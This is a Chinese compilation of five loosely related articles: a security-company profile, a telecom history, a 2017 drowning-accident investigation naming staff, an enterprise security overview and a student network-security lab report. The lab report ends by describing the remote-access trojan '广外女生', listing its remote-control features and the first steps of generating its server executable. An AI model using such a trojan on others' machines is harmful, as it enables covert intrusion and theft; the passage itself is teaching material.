第一篇:信息安全领域企业
启明星辰公司成立于1996年,由留美博士严望佳女士创建,是国内最具实力的、拥有完全自主知识产权的网络安全产品、可信安全管理平台、安全服务与解决方案的综合提供商。2010年6月23日,启明星辰在深交所中小板正式挂牌上市。
启明星辰拥有完善的专业安全产品线,横跨防火墙/UTM、入侵检测管理、网络审计、终端管理、加密认证等技术领域,共有百余个产品型号,并根据客户需求不断增加。启明星辰解决方案为客户的安全需求与信息安全产品、服务之间架起桥梁,将客户的安全保障体系与信息安全核心技术紧密相连,帮助其建立完善的安全保障体系。目前,公司在全国各省市自治区设立三十多家分支机构,拥有覆盖全国的渠道和售后服务体系。
自2002年起,启明星辰就持续保持国内入侵检测、漏洞扫描市场占有率第一。近年来,发展成为国内统一威胁管理、安全管理平台国内市场第一位,安全性审计、安全专业服务市场领导者。
长期以来,启明星辰公司得到了党和国家领导人的关怀与鼓励。2000年1月,江泽民、李岚清、曾庆红等党和国家领导人亲切视察启明星辰公司;2003年1月,胡锦涛总书记亲切接见了启明星辰公司CEO严望佳博士。
凭借多年来的潜心研发,启明星辰成为国家认定的企业级技术中心、国家规划布局内重点软件企业,拥有最高级别的涉及国家秘密的计算机信息系统集成资质,并获得国家火炬计划软件产业优秀企业,中国电子政务IT100强等荣誉。
位于北京中关村软件园的启明星辰大厦,目前是我国规模最大的国家级网络安全研究基地。创造了百余项专利和软件著作权,参与制订国家及行业网络安全标准,填补了我国信息安全科研领域的多项空白。完成包括国家发改委产业化示范工程,国家科技部863计划、国家科技支撑计划等国家级科研项目近百项。
作为信息安全行业的领军企业,启明星辰以用户需求为根本动力,研究开发了完善的专业安全产品线。通过不断耕耘,已经成为在政府、电信、金融、能源、交通、军队、军工、制造等国内高端企业级客户的首选品牌:启明星辰在政府和军队拥有80%的市场占有率,为世界五百强中60%的中国企业客户提供安全产品及服务;在金融领域,启明星辰对政策性银行、国有控股商业银行、全国性股份制商业银行实现90%的覆盖率。在电信领域,启明星辰为中国移动、中国电信、中国联通三大运营商提供安全产品、安全服务和解决方案。
作为北京奥组委独家中标的核心信息安全产品、服务及解决方案提供商,奥帆委唯一信息安全供应商,启明星辰受到独家官方授权,全面负责奥运会主体网络系统的安全保障,得到了国家主管部门的大力嘉奖。此外,启明星辰还为上海世博会、广州亚运会等多项世界级大型活动提供全方位信息安全保障。
在公司快速稳定发展的同时,启明星辰公司坚持以爱心回馈社会,截止目前,已累计资助贫困学子、受灾、贫困群众近2000多万元人民币,并在江西、青海、新疆等地援建了5所希望小学。
启明星辰公司将秉承诚信和创新精神,继续致力于提供具有国际竞争力的自主创新的安全产品和最佳实践服务,帮助客户全面提升其IT基础设施的安全性和生产效能,为打造和提升国际化的民族信息安全产业第一品牌而不懈努力。
第二篇:发展历程——信息领域
1997年6月23日,四川梁山彝族同胞们象过火把节一样,欢天喜地地庆贺当地2000门程控电话正式开通。从这一天起,全国各大县、市的老百姓们都用上了程控电话。我国的电话交换机总容量突破一亿门,中国的电信网一举成为世界第二大通信网。要发展电话通信,离不开电话交换机。它作为整个电话网的心脏,对各个用户的互连、转接起着关键作用。20年前我们的电话交换还是人工和机械的结合。交换效率低,通话容量小。对于那时的老百姓;打电话难,装电话更难。而此时,国外则在尝试着利用计算机控制电话交换,程控交换技术应运而生。通信技术的突飞猛进已容不得我们按部就班地发展。中国的决策者们果断决定;跳过交换技术发展的中间过程,直接向程控交换迈进。让中国的通信技术来一个跨越式的发展。对于习惯了传统设计思路的科研人员来说,要实现技术上的跨越,更需要的是一种大胆的创新精神。搞了大半辈子计算机设计的邬将新,突发奇想;早先的程控机是由计算机部分控制电话交换。如果反过来想,完全可以把交换机看作一台能自动完成交换任务的计算机。沿着这样的思路,邬将新和他的同事们拿出了国内第一台万门程控交换机,04机。04机创新的设计思想和独特的系统结构,让国内外的厂商觉得不可思议。但它实用的功能却让人信服。和国外的交换机相比,04机不但性能稳定,还有易操作的特点。中国的产品在市场上也有了一席之地。巨龙这种创新精神鼓舞了国内厂商,使他们相信靠中国人的聪明才智,程控交换没有什么秘密可言。就在巨龙成功不久,大唐、中兴集团也推出了自己的产品。不到两个月,华为吸取各家技术生产出了08机。技术上的进步反过来又大大增强了国内企业的市场竞争力。到1997年底国产交换机已经占到市场份额的90%。正是这种大胆的创新让中国的企业充满生机,为我们带来了技术和市场的共同突破。国人骄傲而自豪地宣称;这是一次“巨大中华”带来的“群体突破”。这种“群体突破”迅速扩展到整个电信领域。当移动通信技术日益成熟的时候,大唐开始了移动通信机站的开发,在当年产品投放市场。随后的半年内巨龙、中兴、华为也拿出了自己的产品。今天我们的通信设备已经开始向国外大量出口。从当年的引进来到现在的走出去,中国正逐步融入国际竞争的潮流当中。
第三篇:重点领域信息公开
重点领域信息公开
2017年5月24日10时40分左右,新兴重工湖北3611机械有限公司在襄阳市鱼梁州汉江北支航道南岸河堤上(小清河入江口对岸东段3km处)进行消防远程供水系统装备演示时。发生一起淹溺事故,造成一人死亡,直接经济损失109.36万。
根据《安全生产事故报告和调查处理条例》(国务院令第493号)和《湖北省生产安全事故报告和调查处理办法》(省政府令第354号)等有关法律法规的规定,襄阳市人民政府依法成立了由市安监局、市监察局、市公安局、市总工会等有关部门负责同志参加的新兴重工湖北3611机械有限公司“5.24”淹溺事故调查组(以下简称事故调查组),并邀请市人民检察院派员参加事故调查工作。
事故调查组按照“四不放过”和“科学严谨,依法依规,实事求是,注重实效”的原则,通过现场勘察,调查取证,综合分析,查明了事故发生的经过、原因、应急处理、人员伤亡和直接经济损失情况,认定了事故性质和责任,提出了对有关责任人和责任单位的处理建议和事故防范措施建议,现将有关情况报告如下:
一、基本情况
(一)事故单位情况
新兴重工湖北3611机械有限公司(以下简称3611公司)始建于1968年,原隶属于总后军需生产管理部,2008年有工厂制整体改为公司制,现隶属于新兴际华集团有限公司,该公司位于襄阳市人民西路168号,工商营业执照统一社会信用代码为***55N,企业法定代表人邓先义,公司注册资本3亿元,公司经营范围:油料器材,应急供排水装备,汽车零部件铸造和制造;矿产资源开发;货物进出口;汽车、工程机械,发动机,五金工具,金属材料,化工产品,消防车销售;小型机械设备制造;消防器材生产与销售。该公司拥有铝镁合金产品全流程工艺设计与模具制造能力,是新兴际华集团国家级应急救援产业设在中部地区的研发生产基地,产品广泛应用于国防、公安、冶金、能源、化工、食品和环卫等众多领域,现有武汉、襄阳两个生产基地。
该公司是国家级高新技术企业,拥有省级企业技术中心,先后荣获国家科技进步二等奖三项,军队科技进步一等奖一项、二等奖一项、三等奖一项,全军后勤重大科技奖二项,湖北省科技进步奖一项。先后通过了ISO14001环境管理体系认证、ISO9001和TS16949质量管理体系认证、ISO18001职业健康安全管理体系认证,公司副总经理姚启义取得安全生产主要负责人资格证书,设备动力部部长度海涛,安全员常华森分别取得安全管理人员资格证书。2016年2月23日,山东省济南市公安消防支队与3611公司签订了一份采购1套6KM远程供水系统装备合同,合同总金额1830万元,约定合同生效后360天内交货。
(二)远程供水系统演示场地选择情况
3611公司根据采购合同约定在远程供水系统装备交货时,客户先到厂家验收合格后再到客户指定地点演示验收,3611公司向济南市公安消防支队交货的是6KM远程供水系统装备,济南市公安消防支队验收人员要求在实地展开3KM供水线路,全面测试一下系统性能,由于3KM远程供水系统演示在厂区内无法展开,所以,3611公司将演示地点选择在鱼梁州汉江北支航道南岸河堤上(小清河入江口东段3KM处)。该段河堤堤高3.46米,堤顶路面宽6.33米,河堤坡比1:3,堤顶路面较窄,为沙石路面,常有车辆通行,堤边无护栏和树木。
(三)6KM远程供水系统装备组成情况
3611公司生产的6KM远程供水系统主要由2台泵浦消防车和3台水带敷设消防车组成。泵浦消防车是远程供水系统的重要组成部分,主要用于系统的吸水及管路加压,实现长距离输送。泵浦消防车主要有消防车底盘、上装大箱、KTA38-P1200加压发动机总成、DFSS350-614A加压泵、液压系统、液压软管卷盘总成、浮艇泵总成、托盘总成、随车吊总成、控制系统、随车器材等组成。其主要性能指标:管线通径Φ300mm,加压泵出口压力小于1.0MPa,出口流量大于26400L/min,系统供水流量单干线大于13200L/min,双干线大于26400L/min,供水距离大于或等于4000米。水带敷设消防车是远程供水系统的重要组成部分,主要用于远程供水系统水带的自动收发,实现长距离输送。水带敷设消防车主要由底盘、水带收卷机头、水带箱、清洗装置、水带等组成。其主要性能指标:水带通径Φ300mm,水带长度2000米,铺设速度小于45km/h,撤收速度小于2.5km/h。
本次远程供水系统实地演示作业是按照济南市公安消防支队要求,在实地展开3KM供水线路并吸水、出水,其演示系统组成由2台泵浦消防车和2台水带敷设消防车组成。
二、事故发生经过及救援情况
2017年5月24日6时45分,根据3611公司5月23日下午召开的远程供水系统实地演示工作会议安排,特种装备事业部班长陈松带领车间13名工人(姜华、谭志刚、薛正东、郭保华、付修斌、万少军、陈俊、潘耀波、徐飞、陈俊涛、朱非、郭明、詹运军)及济南市公安消防支队3名官兵,驾驶远程供水系统中的2台泵浦消防车和2台水带敷设消防车,由济南市公安消防支队小车开道,从公司出发,途径松鹤路,长虹路,人民路,丹江路,鱼梁州大桥,明珠路到达汉江北支航道南岸河堤(小清河入江口东段3KM处),7时40分左右车队到达演示地点。根据事先工作分工,参演人员开始对3KM远程供水系统进行展开作业。泵浦消防车的展开作业由姜华负责操作,另有2名工人和1名消防战士协助,他们先将浮艇泵放到河边后与吸水管连接,再将浮艇泵送入汉江水中,然后再到堤面将水带敷设车预留的水带连接到泵浦消防车的出水口。第一台水带浦设消防车由济南市公安消防支队1名战士操作,另有3名工人协助,从泵浦消防车处沿河堤堤顶路面向东敷设了2000米供水水带。第二台水带敷设消防车由谭志刚负责操作,另有3名工人协助,在连接第一台水带敷设消防车留下的水带接口后继续向前敷设了1000米供水水带,为了不影响堤顶路面车辆正常通行,水带敷设消防车在沿堤顶路面敷设水带时,随车的线路调整人员将水带移至路边1米左右,在线路末端出水口,由工人薛正东、万少军和陈俊3人接上了流量计,在流量计另一接口连接一段20米,直径300mm的水带,在20米水带末端接入一个三通分水器,分成3个直径150mm的出水口,在3个出水口又分别连接20米(直径150mm)的水带,在3条水带末端又分别接入三个四通分水器,变成12个直径80mm的出水口。远程供水系统展开完毕后,班长陈松带领万少军等5名工人对3000米供水线路的水带连接点进行了检查(供水水带每100米有一个连接头),检查完成后在末端出水口待命,9时40分左右,公司副总姚启义、谭成顶,特种设备部部长王浩,生产管理部部长赵朝刚等人分别到达演示现场(泵浦消防车取水口处),王浩向姜华询问泵浦消防车的展开情况,姜华说“全部准备到位”,大约9时50分左右他们就从取水口处乘车向出水口处巡查,10时左右到达出水口,王浩向陈松询问:“准备好了吗”,陈松说:“准备好了”,王浩说:“通知姜华开始演示”,陈松立即用电话通知姜华开始演示,姜华接到通知后先启动浮艇泵吸水,然后再启动加压泵,20分钟后出水口开始出水,大约出水10分钟左右,陈松发现流量计没有显示,就电话通知詹运军过来进行维修,考虑到距离较远,陈松就让薛正东开自己的私车去接他,詹运军在吸水口处接到电话后就沿河堤向出水口方向走,走到1.5km处遇到薛正东,薛正东告诉他先去取水口送工具,返回时接他一起走,薛正东到达吸水口放下工具后就往回走,在1km处发现有一段供水水带从堤上落入水中(大约1km左右),继续往前走,沿途没发现詹运军。车到达出水口后,薛正东向王浩、陈松报告返回的路上没有看到詹运军,看见有一段水带滑落水中。10时50分左右一名在江边钓鱼的群众路过吸水口处对姜华等人说:“你们的水带把一个钓鱼的人卷入水中了,随后一台面包车也开过来,司机对他们说:“你们的水带把人卷到水里了”。现场工人潘耀波立即给出水口处的王浩打电话报告事故情况,随后两边的参试人员分别赶往出事地点,姚启义指挥达到现场人员赶紧下水救人,他们抬起水带,发现落水者头朝下,背朝上,头和腿都在水中,衣服缠绕在300mm的水带上,无法将人从水带上分开,赵朝刚从附近钓鱼群众那里借来一把小剪刀,将落水者的衣服剪开后将人抬到河堤边,此时救援人员发现落水者是本厂工人詹运军,他们先将其头朝下控水,然后陈松、武概对其进行胸压,王浩对其进行了人工呼吸,同时姚启义又安排其他工人对江边水带落水的地带进行巡查,查找是否有其他人员落水。随后水上公安派出所和“120”救护车赶到,医护人员对詹运军进行现场急救无效,经对其生命体征检查确认死亡。
2017年5月29日,3611公司与死者家属达成死亡赔偿协议,事故善后工作得到妥善处理。
三、事故原因和性质
(一)直接原因
经调查认定,该起事故的直接原因是在远程供水系统演示中,供水线路水带加压充水后发生移位,导致水袋从堤边滑落将正在堤边行走的作业人员带入水中,造成溺水身亡。
(二)间接原因
1、未编制室外演示作业方案,3611公司在组织3KM远程供水系统室外实地演示作业前,没有编制演示作业方案(室外试验大纲),各小组都在凭经验操作,对演示作业中的各个环节存在的安全风险没有辨识,没有提出有针对性的安全防范措施。
2、演示场地选择不当,水带敷设不合安全要求。鱼梁州汉江北支航道南岸河堤(小清河入江口对岸河堤东段)堤高3.46米,堤顶路面宽6.33米,岸堤坡比1:3,堤顶路面较窄,常有车辆通行,堤边无护栏和树木,江边有群众钓鱼,堤顶路边放有摩托车、电动车,为了不影响堤顶路面车辆的正常通行,水带敷设消防车在沿堤顶路面敷设水带时,线路调整人员将水带移至堤顶路边1米左右,在水带加压充水后延伸移位时,极易造成水带沿堤边滑落。
3、演示现场安全防护措施不到位,演示作业人员在沿堤顶路面边缘1米左右敷设水带时,没有采取防止水带移位从堤边滑落的安全措施。
4、演示作业人员安全意识不高。电工詹运军在从取水口(泵浦消防车)到出水口检修流量计时,沿途从河堤堤顶路面外侧边缘(水带与堤边之间)行走,导致在水带移位滑落时将其带入水中。
(三)事故性质
经调查认定:3611公司远程供水系统演示“5.24”淹溺事故是一起生产安全责任事故。
四、对事故责任人和责任单位的处理建议
1、邓先义,男,中共党员,3611公司法定代表人,总经理。履行安全生产管理职责不到位,对事故发生负有领导责任,建议由市安监部门对其给予上一年年收入30%的罚款。
2、李连望,男,中共党员,3611公司副总经理,分管安全生产工作。履行安全生产管理职责不到位,对3611公司安全生产监督指导不力,对事故发生负有主要领导责任,建议由新兴际华集团有限公司按有关规定给予责任追究和经济处罚。
3、赵朝刚,男,中共党员,3611公司生产管理部部长,负责生产经营和安全管理。负责组织远程供水系统演示作业,对远程供水系统室外演示作业未编制方案,演示场地选择不当,水带敷设不符合安全要求,现场安全防护措施不到位等安全问题失察,对事故发生负主要领导责任,建议由3611公司按有关管理规定给予责任追究,并给予经济处罚。
4、王浩,男,中共党员,3611公司特装事业部部长。负责组织远程供水系统演示作业,对远程供水系统室外演示作业未编制方案,演示场地选择不当,水带敷设不符合安全要求,现场防护措施不到位等安全问题失察,对事故发生负有主要领导责任,建议由3611公司按有关管理规定给予责任追究,并给予经济处罚。
5、度海涛,男,中共党员,3611公司设备动力部部长,负责公司安全生产管理。履行安全生产管理职责不到位,对远程供水系统室外演示作业督促指导不力,对事故发生负有领导责任,建议3611公司按有关管理规定,给予责任追究,并给予经济处罚。
6、3611公司对远程供水系统室外演示作业未编制方案,演示场地选择不当,水带敷设不符合安全要求,现场安全防护措施不到位,作业人员安全意识不高,未切实落实企业安全生产主体责任,对事故发生负有责任,建议由市安监局依法对该公司给予行政罚款的处罚。
五、事故防范及整改措施建议1、3611公司要认真吸取事故教训,切实履行企业安全生产主体责任,加大对从业人员的安全教育和技能培训,提高从业人员素质。
2、3611公司要加强特种装备室外演示作业现场的安全管理,完善安全作业规程(室外实验大纲)落实安全技术措施,加强作业现场管理,严格查处违章指挥,违规作业,违反劳动纪律的行为。
3、3611公司要加大隐患排查力度,提高安全风险(隐患)识别能力,增强员工安全防范意识,预防类似事故的再次发生。
附件:
1、新兴重工湖北3611机械有限公司
“5.24”淹溺事故死亡人员名单
2、新兴重工湖北3611机械有限公司
“5.24”淹溺事故直接经济损失。
3、新兴重工湖北3611机械有限公司
“5.24”淹溺事故调查组成员签名
4、事故现场照片襄阳市人民政府新兴重工湖北3611机械有限公司“5.24”淹溺事故调查组
2017年6月23日
第四篇:企业网络信息安全解决方案
企业网络信息安全解决方案
一、信息安全化定义
企业信息安全管理即针对当前企业面临的病毒泛滥、黑客入侵、恶意软件、信息失控等复杂的应用环境制定相应的防御措施,保护企业信息和企业信息系统不被未经授权的访问、使用、泄露、中断、修改和破坏,为企业信息和企业信息系统提供保密性、完整性、真实性、可用性、不可否认性服务。简而言之,使非法者看不了、改不了信息,系统瘫不了、信息假不了、行为赖不了。
二、企业信息安全管理现状
当前企业在信息安全管理中普遍面临的问题:
(1)缺乏来自法律规范的推动力和约束;
(2)安全管理缺乏系统管理的思想。被动应付多于主动防御,没有做前期的预防,而是出现问题才去想补救的办法,不是建立在风险评估基础上的动态的持续改进的管理方法;
(3)重视安全技术,忽视安全管理。企业愿意在防火墙等安全技术上投资,而相应的管理水平、手段没有体现,包括管理的技术和流程,以及员工的管理;
(4)在安全管理中不够重视人的因素;(5)缺乏懂得管理的信息安全技术人员;
(6)企业安全意识不强,员工接受的教育和培训不够。
三、企业信息安全管理产品
建立完善的企业信息安全管理系统,必须内外兼修,一方面要防止外部入侵,另一方面也要防范内部人员泄密可能。所以在选择企业信息安全管理产品时,必须是一个完整的体系结构。目前,在市场上比较流行,而又能够代表未来发展方向的安全产品大致有以下几类:用户身份认证,如静态密码、动态密码(短信密码、动态口令牌、手机令牌)、USB KEY、IC卡、数字证书、指纹虹膜等。
防火墙
即访问控制系统,它在内部网络与不安全的外部网络之间设置障碍,阻止外界对内部资源的非法访问,防止内部对外部的不安全访问。但它其本身可能存在安全问题,也可能会是一个潜在的瓶颈。
安全路由器
由于WAN连接需要专用的路由器设备,因而可通过路由器来控制网络传输。通常采用访问控制列表技术来控制网络信息流。
安全服务器
安全服务器主要针对一个局域网内部信息存储、传输的安全保密问题,其实现功能包括对局域网资源的管理和控制,对局域网内用户的管理,以及局域网中所有安全相关事件的审计和跟踪。
安全管理中心
由于网上的安全产品较多,且分布在不同的位置,这就需要建立一套集中管理的机制和设备,即安全管理中心。它用来给各网络安全设备分发密钥,监控网络安全设备的运行状态,负责收集网络安全设备的审计信息等。
入侵检测系统(IDS)
入侵检测,作为传统保护机制(比如访问控制,身份识别等)的有效补充,形成了信息系统中不可或缺的反馈链。
入侵防御系统(IPS)
入侵防御,入侵防御系统作为IDS很好的补充,是信息安全发展过程中占据重要位置的计算机网络硬件。
安全数据库
由于大量的信息存储在计算机数据库内,有些信息是有价值的,也是敏感的,需要保护。安全数据库可以确保数据库的完整性、可靠性、有效性、机密性、可审计性及存取控制与用户身份识别等。
数据容灾设备
数据容灾作为一个重要的企业信息安全管理体系中的一个重要补救措施,在整个企业信息安全管理体系中有着举足轻重的作用。数据容灾设备包括数据恢复设备、数据复制设备、数据销毁设备等。目前应用较多的数据容灾设备包括效率源HD Doctor、Data Compass数据指南针、Data Copy King硬盘复制机、开盘机等。
编辑本段企业信息安全管理对策 1.网络管理
一般企业网与互联网物理隔离, 因而与互联网相比, 其安全性较高, 但在日常运行管理中我们仍然面临网络链路维护、违规使用网络事件等问题, 具体而言:
(1)在IP 资源管理方面, 采用IP MAC 捆绑的技术手段防止用户随意更改IP 地址和随意更换交换机上的端口。这分两种情况实现, 第一种情况是如果客户机连在支持网管的交换机上的, 可以通过网管中心的管理软件, 对该交换机远程实施Port Security 策略, 将客户端网卡MAC 地址固定绑在相应端口上。第二种情况是如果客户机连接的交换机或集线器不支持网管, 则可以通过Web 网页调用一个程序, 通过该程序把MAC 地址和IP 地址捆绑在一起。这样, 就不会出现IP 地址被盗用而不能正常使用网络的情况。
(2)在网络流量监测方面, 可使用网络监测软件对网络传输数据协议类型进行分类统计, 查看数据、视频、语音等各种应用的利用带宽, 防止频繁进行大文件的传输, 甚至发现病毒的转移及传播方向。
2.服务器管理
常见应用服务器安装的操作系统多为Windows 系列,服务器的管理包括服务器安全审核、组策略实施、服务器的备份策略。服务器安全审核是网管日常工作项目之一, 审核的范围包括安全漏洞检查、日志分析、补丁安装情况检查等, 审核的对象可以是DC、Exchange Server、SQL Server、IIS 等。
在组策略实施时, 如果想使用软件限制策略, 即哪些客户不能使用哪个软件, 则需要把操作系统升级到Windows 2003 Server。服务器的备份策略包括系统软件备份和数据库备份两部分, 系统软件备份拟利用现有的专用备份程序, 制定一个合理的备份策略, 如每周日晚上做一次完全备份, 然后周一到周五晚上做增量备份或差额备份;定期对服务器备份工作情况等。
3.客户端管理
对大多数单位的网管来说, 客户端的管理都是最头痛的问题, 只有得力的措施才能解决这个问题, 这里介绍以下几种方法:
1)将客户端都加入到域中, 这一点很重要, 因为只有这样, 客户端才能纳入管理员集中管理的范围。
2)只给用户以普通域用户的身份登录到域, 因为普通域用户不属于本地Administrators 和Power Users 组, 这样就可以限制他们在本地计算机上安装大多数软件(某些软件普通用户也可以安装)。当然为了便于用户工作, 应通过本地安全策略, 授予他们“关机”和“修改系统时间”等权利。
3)实现客户端操作系统补丁程序的自动安装。4)实现客户端防病毒软件的自动更新。
5)利用SMS 对客户端进行不定期监控, 发现不正常情况及时处理。
4.数据备份与数据加密
由于应用系统的加入, 各种数据库日趋增长, 如何确保数据在发生故障或灾难性事件情况下不丢失, 是当前面临的一个难题。这里介绍四种解决方法: 第一种解决办法是用磁带机或硬盘进行数据备份。该办法价格最低, 保存性最强, 不足之处是备份的只是某个时间点。第二种方案是采用本地磁盘阵列来分别实现各服务器的本地硬盘数据冗余。第三种方案是采用双机容错方式, 两台机器系统相互备份, 应用层数据全部放在共享的磁盘阵列柜中, 这种方式能解决单机故障或宕机的问题, 同时又能防止单个硬盘故障导致的数据丢失, 但前期投资较大。第四种方案是采用NAS 或SAN 来实现各服务器的集中区域存储, 实现较高级别的磁盘等硬件故障的数据备份, 但是成本较高, 一般不能防止系统层的故障, 如感染病毒或系统崩溃。考虑到网络上非认证用户可能试图旁路系统的情况, 如物理地“取走”数据库, 在通信线路上窃听截获。对这样的威胁最有效的解决方法就是数据加密, 即以加密格式存储和传输敏感数据。发送方用加密密钥, 通过加密设备或算法, 将信息加密后发送出去。接收方在收到密文后, 用解密密钥将密文解密, 恢复为明文。如果传输中有人窃取,他只能得到无法理解的密文, 从而对信息起到保密作用。
5.病毒防治
对防病毒软件的要求是: 能支持多种平台, 至少是在Windows 系列操作系统上都能运行;能提供中心管理工具, 对各类服务器和工作站统一管理和控制;在软件安装、病毒代码升级等方面, 可通过服务器直接进行分发, 尽可能减少客户端维护工作量;病毒代码的升级要迅速有效。在实施过程中, 本单位以一台服务器作为中央控制一级服务器, 实现对网络中所有计算机的保护和监控, 并使用其中有效的管理功能, 如: 管理员可以向客产端发送病毒警报、强制对远程客户端进行病毒扫描、锁定远程客产端等。正常情况下, 一级服务器病毒代码库升级后半分钟内, 客户端的病毒代码库也进行了同步更新。
四、企业网络、信息安全解决方案 1)大型企业
大型企业部门林立,相当一部分会在外地有分支机构,业务系统普遍采用建设虚拟专网的方式,起到外部分支访问总部数据的通道和安全加密作用。传统的网络安全设备基本都已经部署,比如防火墙,可以把企业访问互联网的风险降低,但是大型企业的网络、信息安全威胁主要来源于恶意的攻击行为和企业员工有意、无意的操作行为,致使业务系统不能正常使用,或者机密数据外泄,对企业的网络安全,信息保密造成很大的威胁,拥有功能强大的上网行为管理设备、入侵检测系统和防泄密系统能有效杜绝各个环节可能出现的不安全隐患,保障业务系统的政策正常安全运行和企业机密数据的安全。
建议大型企业在网络中部署:防火墙、IDS、上网行为管理、防泄密系统、VPN、安全服务器等。
2)中型企业
中型企业基本已具备完整的网络体系,但是企业的信息化技术力量相对大型企业可能薄弱一点,对于员工的上网行为和电脑操作行为可能要求得不会太严格,即使向员工制定了一定的管理制度,也会在制度的执行过程中因为人为的因素而变成一纸空文,所以用硬件设备来保障和规范网络、信息的安全尤为重要,中型企业的网络、信息安全威胁主要来源于外网的攻击、内部网络使用的不规范导致的木马、病毒等安全威胁。
建议中型企业部署:防火墙、IDS、路由器、上网行为管理、防泄密系统等。
3)小型企业
小型企业在人员规模、基础建设、资金实力等方面都相对落后于大中型企业,但是在发展阶段的小型企业,对网络、信息的安全问题同样不能忽视,目前各式各样的聊天工具、视频网站、网游、P2P下载等,都会直接影响到员工的工作效率,并且占用了大部分的带宽,使得业务系统和正常的工作无法得到保障,且小型企业一般不会配置专业的网管人员,这就是有的小型企业配置了好的电脑,够用的宽带,但是仍然有大部分员工一直抱怨总是不能上网,或者上网太慢,邮件发不出去等问题。从综合实力来讲,小型企业在网络、信息安全方面的投入会比较有限,建议企业配置中低端的安全设备,防火墙,上网行为管理,以研发和设计为主的企业对于防泄密系统的部署还是有必要的。
第五篇:【企业网络】网络信息安全报告
XX中型企业网安全 网络信息安全报告
一、实验目的及要求
该专周的目标是让学生掌握网络安全的基本框架,网络安全的基本理论。以及了解计算机网络安全方面的管理、配置和维护。
本课程要求在理论教学上以必需够用为原则,应尽量避免过深过繁的理论探讨,重在理解网络安全的基本框架,网络安全的基本理论。掌握数据加密、防火墙技术、入侵检测技术以及学习网络病毒防治。了解Windows 2000的安全、Web的安全、网络安全工程以及黑客常用的系统攻击方法。本课程要求学生对计算机的使用有一定了解(了解Windows的使用,具有键盘操作和文件处理的基础),并已经掌握计算机网络的基本原理。
二、专周内容
1、安全需求分析
(1)网络安全问题主要集中在对服务器的安全保护、防黑客和病毒、重要网段的保护及管理安全上。因此,我们必须采取相应的安全措施杜绝安全隐患,其中应该做到:
A、公开服务器的安全保护 B、防止黑客从外部攻击 C、入侵检测与监控 D、病毒防护 E、数据安全保护 F、网络的安全管理
(2)解决网络安全问题的一些要求
A、大幅度地提高系统的安全性(重点是可用性和可控性);
B、保持网络原有的特点,即对网络的协议和传输具有良好的透明性,能透明接入,无需更改网络设置;
C、易于操作、维护,并便于自动化管理,而不增加或少增加附加操作;
D、尽量不影响原网络拓扑结构,同时便于系统及系统功能的扩展;
E、安全保密系统具有较好的性能价格比。一次性投资,可以长期使用;
F、安全产品具有合法性,及经过国家有关管理部门的认可或认证;
(3)系统安全目标
A、建立一套完整可行的网络安全与网络管理策略;
B、将内部网络、公开服务器网络和外网进行有效隔离,避免与外部网络直接通信;
C、建立网站各主机和服务器的安全保护措施,保证他们的系统安全;
D、加强合法用户的访问认证,同时将用户的访问权限控制在最低限度;
E、全面监视对公开服务器的访问,及时发现和拒绝不安全的操作和黑客攻击行为;
F、加强对各种访问的审计工作,详细记录对网络、公开服务器的访问行为,形成完整的系统日志;
2、网络拓扑
3、网络安全的基本内容
(1)基本网络命令
A、ping命令: ping –t IP,向指定的计算机不停的发送数据包,按Ctr+Break快捷键可以查看统计信息并继续运行,按 Ctr+C可中止运行。
B、Tracert命令:tracert IP 显示从本地计算机到目标服务器所经过的计算机:
C、pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
(2)操作系统安全
A、屏蔽不需要的服务组件
开始——程序——管理工具——服务 出现以下窗口:
然后在该对话框中选中需要屏蔽的程序,并单击右键,然后选择“停止”命令,同时将“启动类型”设置为“手动”或“已禁用”,这样就可以对指定的服务组进行屏蔽了。B、关闭默认共享:“开始”——“程序”——“管理工具”——“服务”——“Server”
(3)数据库系统安全
A、使用安全的帐号策略和Windows认证模式
由于SQL Server不能更改sa用户名称,也不能删除这个超级用户,所以,我们必须对这个帐号进行最强的保护,当然,包括使用一个非常强壮的密码,最好不要在数据库应用中使用sa帐号,只有当没有其它方法登录到 SQL Server 实例(例如,当其它系统管理员不可用或忘记了密码)时才使用 sa。可以新建立一个拥有与sa一样权限的超级用户来管理数据库。安全的帐号策略还包括不要让管理员权限的帐号泛滥。
SQL Server的认证模式有Windows身份认证和混合身份认证两种。在任何可能的时候,应该对指向SQL Server的连接要求Windows身份验证模式。
Windows认证模式比混合模式更优越,原因在以下:
1)它通过限制对Microsoft Windows用户和域用户帐户的连接,保护SQL Server免受大部分Internet工具的侵害。
2)服务器将从Windows安全增强机制中获益,例如更强的身份验证协议以及强制的密码复杂性和过期时间。
3)使用Windows认证,不需要将密码存放在连接字符串中。存储密码是使用标准SQL Server登录的应用程序的主要漏洞之一。
4)Windows认证意味着你只需要将密码存放在一个地方。
要在SQL Server的Enterprise Manager安装Windows身份验证模式,步骤操作: 展开服务器组——右键点击服务器——然后点击“属性”——在安全性选项卡的身份验证中——点击“仅限Windows”。(4)网络防火墙工具:红墙主机网络防火墙 安装
1.具体操作如下:
第一步: 将“爱思红墙主机网络防火墙”的安装光盘插入驱动器,运行根目录下的Setup文件来运行其安装程序,进入“爱思红墙主机网络防火墙安装”窗口;
第二步:
在“欢迎安装爱思红墙主机网络防火墙”对话框中,单击“下一步”按钮;
第三步: 在“软件许可协议”对话框,接受协议点击“是”;
第四步: 点击“是”按钮,出现显示您计算机的相关信息,即判断是否可以安装本软件;
第五步: 单击“下一步”按钮,出现“选择目标位置”对话框;
第六步: 在该对话框中,单击“浏览”按钮,并在“选择文件夹”对话框中选择盘符作为驱动器,再指定相应的文件夹及路径,然后单击“确定”按钮;
第七步: 单击“下一步”按钮,出现“选择安装程序名称”对话框,您可自定义程序名称;
第八步: 单击“下一步”按钮,系统开始复制文件;
第九步: 进入“红墙主机网络防火墙配置”窗口,作出是否运行“红墙应用程序扫描系统”的选择后,点击“完成”。
相关设置:告警设置:系统提供了两种情况下的告警,即需要系统告警和不需要系统告警,您可据需要选取告警设置。
点击主界面中的“规则管理”按钮,弹出相应窗口,如下图:
网络监控中心:
(5)网络攻击工具:“广外女生”
它的基本功能有:文件管理方面有上传,下载,删除,改名,设置属性,建立文件夹和运行指定文件等功能;注册表操作方面:全面模拟WINDOWS的注册表编辑器,让远程注册表编辑工作有如在本机上操作一样方便;屏幕控制方面:可以自定义图片的质量来减少传输的时间,在局域网或高网速的地方还可以全屏操作对方的鼠标及键盘,就像操纵自己的计算机一样;远程任务管理方面,可以直观地浏览对方窗体,随意杀掉对方窗体或其中的控件;其他功能还有邮件IP通知等。
主要步骤:首先运行“gwg.exe”,出现如图窗口:
选中“服务端设置”,生成“GDUFS.exe”木马:
